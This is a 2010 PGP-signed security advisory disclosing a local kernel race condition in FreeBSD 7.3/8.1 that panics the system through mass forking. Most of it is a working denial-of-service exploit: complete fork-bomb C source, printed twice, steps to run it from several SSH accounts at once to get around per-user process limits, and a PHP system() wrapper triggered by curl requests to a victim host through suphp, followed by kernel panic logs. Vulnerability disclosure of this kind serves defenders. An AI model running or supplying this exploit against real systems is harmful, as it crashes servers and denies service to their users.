343 lines
No EOL
8.4 KiB
Text
343 lines
No EOL
8.4 KiB
Text
-----BEGIN PGP SIGNED MESSAGE-----
|
|
Hash: SHA1
|
|
|
|
[ FreeBSD 8.1/7.3 vm.pmap kernel local race condition ]
|
|
|
|
Author: Maksymilian Arciemowicz
|
|
http://SecurityReason.com
|
|
http://lu.cxib.net
|
|
Date:
|
|
- - Dis.: 09.07.2010
|
|
- - Pub.: 07.09.2010
|
|
|
|
Affected Software (verified):
|
|
- - FreeBSD 7.3/8.1
|
|
|
|
Original URL:
|
|
http://securityreason.com/achievement_securityalert/88
|
|
|
|
|
|
- --- 0.Description ---
|
|
maxproc
|
|
This is the maximum number of processes a user may be running. This
|
|
includes foreground and background processes alike. For obvious reasons,
|
|
this may not be larger than the system limit specified by the
|
|
kern.maxproc sysctl(8). Also note that setting this too small may hinder
|
|
a user's productivity: it is often useful to be logged in multiple times
|
|
or execute pipelines. Some tasks, such as compiling a large program,
|
|
also spawn multiple processes (e.g., make(1), cc(1), and other
|
|
intermediate preprocessors).
|
|
vm.pmap.shpgperproc
|
|
|
|
|
|
- --- 1. FreeBSD 8.1/7.3 kernel local race condition ---
|
|
Race condition in pmap, allows attackers to denial of service freebsd
|
|
kernel. Creating a lot of process by fork() (~ kern.maxproc), it's
|
|
possible to denial kernel.
|
|
To bypass the MAXPROC from login.conf, we can use a few users to run PoC
|
|
in this same time, to reach kern.maxproc. suphp can be very usefully.
|
|
|
|
We need choose vector attack. When we have access to few users via ssh,
|
|
use openssh.
|
|
|
|
Example attack by ssh
|
|
POC:
|
|
|
|
/*
|
|
FreeBSD 7.3/8.1 pmap race condition PoC
|
|
Credit: Maksymilian Arciemowicz
|
|
*/
|
|
#include <stdio.h>
|
|
#include <sys/types.h>
|
|
#include <unistd.h>
|
|
|
|
void newproc(){
|
|
again:
|
|
fork();
|
|
sleep(3600*24);
|
|
goto again;
|
|
}
|
|
|
|
void runfork(){
|
|
pid_t adr;
|
|
if(0!=(adr=fork())) printf("fork not zero\n");
|
|
else {
|
|
printf("fork zero\n");
|
|
newproc();
|
|
}
|
|
}
|
|
|
|
int main(){
|
|
|
|
int secdel=5;
|
|
int dev;
|
|
|
|
// clock with (int)secdel secound frequency
|
|
while(1){
|
|
printf("sleep %i sec\n",secdel);
|
|
sleep(secdel);
|
|
printf("weak up\n");
|
|
|
|
// create 512 processes
|
|
dev=512;
|
|
while(dev--)
|
|
runfork();
|
|
}
|
|
return 0;
|
|
}
|
|
|
|
|
|
127# ssh cx () 0
|
|
Password:
|
|
$ gcc -o poc81 poc81.c
|
|
$ ./poc81
|
|
|
|
and in the same time (symetric)
|
|
|
|
127# ssh max () 0
|
|
Password:
|
|
$ gcc -o poc81 poc81.c
|
|
$ ./poc81
|
|
|
|
Result:
|
|
Jul 29 08:41:29 127 kernel: maxproc limit exceeded by uid 1002, please
|
|
see tuning(7) and login.conf(5).
|
|
Jul 29 08:42:01 127 last message repeated 31 times
|
|
Jul 29 08:44:02 127 last message repeated 119 times
|
|
Jul 29 08:50:27 127 syslogd: kernel boot file is /boot/kernel/kernel
|
|
Jul 29 08:50:27 127 kernel: maxproc limit exceeded by uid 0, please see
|
|
tuning(7) and login.conf(5).
|
|
Jul 29 08:50:27 127 kernel: panic: get_pv_entry: increase
|
|
vm.pmap.shpgperproc
|
|
Jul 29 08:50:27 127 kernel: cpuid = 0
|
|
Jul 29 08:50:27 127 kernel: Uptime: 13m23s
|
|
Jul 29 08:50:27 127 kernel: Cannot dump. Device not defined or unavailable.
|
|
Jul 29 08:50:27 127 kernel: Automatic reboot in 15 seconds - press a key
|
|
on the console to abort
|
|
Jul 29 08:50:27 127 kernel: --> Press a key on the console to reboot,
|
|
Jul 29 08:50:27 127 kernel: --> or switch off the system now.
|
|
Jul 29 08:50:27 127 kernel: Rebooting...
|
|
Jul 29 08:50:27 127 kernel: Copyright (c) 1992-2010 The FreeBSD Project.
|
|
|
|
But when we have php-shell from several uid`s, we can also use suphp.
|
|
|
|
Example attack by suphp:
|
|
127# cat cxuser.php
|
|
<?php
|
|
system("./def");
|
|
?>
|
|
127# ls -la
|
|
total 16
|
|
drwxr-xr-x 2 root wheel 512 Jul 29 08:43 .
|
|
drwxr-xr-x 4 root wheel 512 Jul 29 08:38 ..
|
|
- -rw-r--r-- 1 cx cx 27 Jul 29 08:38 cxuser.php
|
|
- -rwxr-xr-x 1 cx cx 7220 Jul 29 08:38 def
|
|
- -rw-r--r-- 1 max max 27 Jul 29 08:43 maxuser.php
|
|
|
|
now remote request to cxuser.php and maxuser.php
|
|
|
|
curl http://victim/hack/cxuser.php
|
|
and in the same time
|
|
curl http://victim/hack/maxuser.php
|
|
|
|
result:
|
|
Jul 29 08:43:07 localhost login: ROOT LOGIN (root) ON ttyv0
|
|
Jul 29 08:48:30 localhost syslogd: kernel boot file is /boot/kernel/kernel
|
|
Jul 29 08:48:30 localhost kernel: maxproc limit exceeded by uid 1001,
|
|
please see tuning(7) and login.conf(5).
|
|
Jul 29 08:48:30 localhost kernel: panic: get_pv_entry: increase
|
|
vm.pmap.shpgperproc
|
|
Jul 29 08:48:30 localhost kernel: cpuid = 0
|
|
Jul 29 08:48:30 localhost kernel: Uptime: 4m43s
|
|
Jul 29 08:48:30 localhost kernel:
|
|
Jul 29 08:48:30 localhost kernel: Dump failed. Partition too small.
|
|
Jul 29 08:48:30 localhost kernel: Automatic reboot in 15 seconds - press
|
|
a key on the console to abort
|
|
Jul 29 08:48:30 localhost kernel: Rebooting...
|
|
Jul 29 08:48:30 localhost kernel: Copyright (c) 1992-2010 The FreeBSD
|
|
Project.
|
|
|
|
|
|
- ---debug log - cron (uid=0)---
|
|
...
|
|
maxproc limit exceeded by uid 1002, please see tuning(7) and login.conf(5).
|
|
maxproc limit exceeded by uid 1001, please see tuning(7) and login.conf(5).
|
|
maxproc limit exceeded by uid 1001, please see tuning(7) and login.conf(5).
|
|
maxproc limit exceeded by uid 1002, please see tuning(7) and login.conf(5).
|
|
panic: get_pv_entry: increase vm.pmap.shpgperproc
|
|
cpuid = 0
|
|
KDB: enter: panic
|
|
[ thread pid 7417 tid 106207 ]
|
|
Stopped at kdb_enter+0x3a: movl $0,kdb_why
|
|
...
|
|
KDB: enter: panic
|
|
[ thread pid 7417 tid 106207 ]
|
|
Stopped at kdb_enter+0x3a: movl $0,kdb_why
|
|
db> ps
|
|
pid ppid pgrp uid state wmesg wchan cmd
|
|
7417 880 880 0 RL CPU 0 cron
|
|
7416 880 880 0 RL cron
|
|
7415 7413 880 0 RVL cron
|
|
7414 7412 7412 0 R sh
|
|
7413 880 880 0 D ppwait 0xc8118548 cron
|
|
7412 7411 7412 0 Ss wait 0xc8118aa0 sh
|
|
7411 880 880 0 S piperd 0xc4d7eab8 cron
|
|
7410 5367 1294 1001 RL+ def
|
|
7409 5366 1294 1001 RL+ def
|
|
7408 5365 1294 1001 RL+ def
|
|
7407 5364 1294 1001 RL+ def
|
|
7406 5363 1294 1001 RL+ def
|
|
7405 5362 1294 1001 RL+ def
|
|
7404 5361 1294 1001 RL+ def
|
|
...
|
|
db> trace
|
|
Tracing pid 7417 tid 106207 td 0xc8113280
|
|
kdb_enter(c0ccfb5c,c0ccfb5c,c0d0a037,e7f9da38,0,...) at kdb_enter+0x3a
|
|
panic(c0d0a037,10,c0d09b5f,88c,0,...) at panic+0x136
|
|
get_pv_entry(c80bcce0,0,c0d09b5f,ccd,c0fabd00,...) at get_pv entry+0x252
|
|
pmap_enter(c80bcce0,a0f7000,1,c2478138,5,...) at pmap_enter+0x34c
|
|
vm_fault(c8Obcc30,a0f7000,1,0,a0f711b,...) at vm_fault+0x1b02
|
|
trap_pfault(5,0,c0dOblle,c0cd1707,c8118550,...) at trap_pfault+0xl0d
|
|
trap(e7f9dd28) at trap+0x2d0
|
|
calltrap() at calltrap+0x6
|
|
- --- trap 0xc, eip = 0xa0f711b, esp = 0xbfbfec8c, ebp = 0xbfbfecc8 --
|
|
db> show pcpu
|
|
cpuid = 0
|
|
dynamic pcpu = 0x627d00
|
|
curthread = 0xc8113280: pid 7417 "cron"
|
|
curpcb = 0xe7f9dd80
|
|
fpcurthread = none
|
|
idlethread = 0xc4183a00: tid 100003 "idle: cpu0"
|
|
APIC ID = 0
|
|
currentldt = 0x50
|
|
spin locks held:
|
|
...
|
|
db> show registers
|
|
cs 0x20
|
|
ds 0xc0cc0028
|
|
es 0xc0d00028
|
|
fs 0xc08f0008 free_unr+0x188
|
|
ss 0x28
|
|
eax 0xc0ccfb5c
|
|
ecx 0xc148792f
|
|
edx 0
|
|
ebx 0xl
|
|
esp 0xe7f9d9f8
|
|
ebp 0xe7f9da00
|
|
esi 0x100
|
|
edi 0xc8113280
|
|
eip 0xc08de44a kdb_enter+0x3a
|
|
efl 0x286
|
|
kdb_enter+0x3a: movl $0,kdb_why
|
|
...
|
|
db> show page
|
|
cnt.v_free_count: 104827
|
|
cnt.v_cache_count: 11
|
|
cnt.v_inactive_count: 3369
|
|
cnt.v_active_count: 44397
|
|
cnt.v_wire_count: 58250
|
|
cnt.v_free_reserved: 324
|
|
cnt.v_free_min: 1377
|
|
cnt.v_free_target: 5832
|
|
cnt.v_cache_min: 5832
|
|
cnt.v_inactive_target: 8748
|
|
...
|
|
- ---debug log - crash in cron (uid=0)---
|
|
|
|
- ---debug log - crash in def (uid=1001)---
|
|
db> ps
|
|
...
|
|
6774 4777 2009 1001 RL+ def
|
|
6773 4777 2009 1001 RL+ CPU 0 def
|
|
6772 4777 2009 1001 RL+ def
|
|
...
|
|
db> show pcpu
|
|
cpuid = 0
|
|
dynamic pcpu = 0x627d00
|
|
curthread = Oxc8c34c80: pid 6773 "def"
|
|
curpcb = Oxe97f6d80
|
|
fpcurthread = none
|
|
idlethread = 0xc4183a00: tid 100003 "idle: cpu0"
|
|
APIC ID = 0
|
|
currentldt = 0x50
|
|
spin locks held:
|
|
...
|
|
- ---debug log - crash in def (uid=1001)---
|
|
|
|
- --- 2. PoC def2.c ---
|
|
/*
|
|
FreeBSD 7.3/8.1 pmap race condition PoC
|
|
Credit: Maksymilian Arciemowicz
|
|
*/
|
|
#include <stdio.h>
|
|
#include <sys/types.h>
|
|
#include <unistd.h>
|
|
|
|
void newproc(){
|
|
again:
|
|
fork();
|
|
sleep(3600*24);
|
|
goto again;
|
|
}
|
|
|
|
void runfork(){
|
|
pid_t adr;
|
|
if(0!=(adr=fork())) printf("fork not zero\n");
|
|
else {
|
|
printf("fork zero\n");
|
|
newproc();
|
|
}
|
|
}
|
|
|
|
int main(){
|
|
|
|
int secdel=5;
|
|
int dev;
|
|
|
|
// clock with (int)secdel secound frequency
|
|
while(1){
|
|
printf("sleep %i sec\n",secdel);
|
|
sleep(secdel);
|
|
printf("weak up\n");
|
|
|
|
// create 512 processes
|
|
dev=512;
|
|
while(dev--)
|
|
runfork();
|
|
}
|
|
return 0;
|
|
}
|
|
|
|
|
|
- --- 3. Greets ---
|
|
sp3x, Infospec, Adam Zabrocki 'pi3'
|
|
|
|
|
|
- --- 4. Contact ---
|
|
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
|
|
|
|
Email:
|
|
- - cxib {a\./t] securityreason [d=t} com
|
|
|
|
GPG:
|
|
- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
|
|
|
|
http://securityreason.com/
|
|
http://lu.cxib.net/
|
|
|
|
- --
|
|
Best Regards,
|
|
- ------------------------
|
|
pub 1024D/A6986BD6 2008-08-22
|
|
uid Maksymilian Arciemowicz (cxib)
|
|
<cxib () securityreason com>
|
|
sub 4096g/0889FA9A 2008-08-22
|
|
|
|
http://securityreason.com
|
|
http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
|
|
-----BEGIN PGP SIGNATURE-----
|
|
|
|
iEYEARECAAYFAkyGff0ACgkQpiCeOKaYa9b0QQCfbY7yNcbUa7TDOTYxzgN7ya0y
|
|
yQMAn079PHiu7Uy5WU3gvsJnvzZ0M8qO
|
|
=D5mh
|
|
-----END PGP SIGNATURE----- |